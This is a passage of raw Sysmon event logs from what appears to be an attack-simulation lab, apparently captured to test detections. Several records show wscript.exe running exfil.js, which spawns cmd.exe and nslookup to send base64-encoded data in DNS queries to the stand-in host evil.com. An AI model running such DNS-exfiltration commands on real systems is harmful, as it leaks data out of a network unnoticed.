10341000x8000000000000000216156Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.153{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216155Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.153{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1901-629A-9246-000000005F02}6856C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216154Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.153{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216153Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.153{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216152Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.153{2E1864BB-1901-629A-9046-000000005F02}60367644C:\Windows\system32\cmd.exe{2E1864BB-1901-629A-9246-000000005F02}6856C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216151Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.156{2E1864BB-1901-629A-9246-000000005F02}6856C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1901-629A-9046-000000005F02}6036C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljmwl.tmp 2>&1 354300x8000000000000000216150Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.794{00000000-0000-0000-0000-000000000000}8156<unknown process>-udpfalsefalse127.0.0.1-51343-false127.0.0.1-53domain 354300x8000000000000000216149Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.557{00000000-0000-0000-0000-000000000000}7944<unknown process>-udptruefalse127.0.0.1-51336-false127.0.0.1-53domain 354300x8000000000000000216148Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.273{00000000-0000-0000-0000-000000000000}1848<unknown process>-udptruefalse127.0.0.1-51327-false127.0.0.1-53domain 354300x8000000000000000216147Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.091{00000000-0000-0000-0000-000000000000}7904<unknown process>-udptruefalse127.0.0.1-51322-false127.0.0.1-53domain 10341000x8000000000000000216146Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.106{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-1901-629A-9146-000000005F02}5216C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216145Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.106{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1901-629A-9146-000000005F02}5216C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216144Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.106{2E1864BB-1901-629A-9146-000000005F02}52164908C:\Windows\system32\conhost.exe{2E1864BB-1901-629A-9046-000000005F02}6036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216143Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.084{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1901-629A-9146-000000005F02}5216C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216142Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.084{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216141Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.084{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216140Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.084{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216139Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.084{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216138Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.084{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1901-629A-9046-000000005F02}6036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216137Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.084{2E1864BB-18E0-629A-6742-000000005F02}39766116C:\Windows\System32\WScript.exe{2E1864BB-1901-629A-9046-000000005F02}6036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216136Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.087{2E1864BB-1901-629A-9046-000000005F02}6036C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljmwl.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000216135Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.069{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlcwt.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216134Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.053{2E1864BB-1901-629A-8E46-000000005F02}71443568C:\Windows\system32\conhost.exe{2E1864BB-1901-629A-8F46-000000005F02}7556C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216133Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.053{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216132Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.053{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216131Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.053{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216130Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.053{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216129Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.053{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1901-629A-8F46-000000005F02}7556C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216128Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.053{2E1864BB-1900-629A-8D46-000000005F02}76482556C:\Windows\system32\cmd.exe{2E1864BB-1901-629A-8F46-000000005F02}7556C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216127Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.059{2E1864BB-1901-629A-8F46-000000005F02}7556C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1900-629A-8D46-000000005F02}7648C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcwt.tmp 2>&1 10341000x8000000000000000216126Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.022{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-1901-629A-8E46-000000005F02}7144C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216125Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.022{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1901-629A-8E46-000000005F02}7144C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216124Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.022{2E1864BB-1901-629A-8E46-000000005F02}71443568C:\Windows\system32\conhost.exe{2E1864BB-1900-629A-8D46-000000005F02}7648C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216123Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.006{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1901-629A-8E46-000000005F02}7144C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 23542300x800000000000000044923Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:53.425{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=452E7F8BC079448FAEA876B3DEF43ACA,SHA256=FDD9EA6738C78DAF17DBAAB2CC243A52CD03CF5994E0DC525B9A058DBFAAAFAA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216695Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.973{2E1864BB-1902-629A-C446-000000005F02}53844640C:\Windows\system32\conhost.exe{2E1864BB-1902-629A-C546-000000005F02}2848C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216694Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 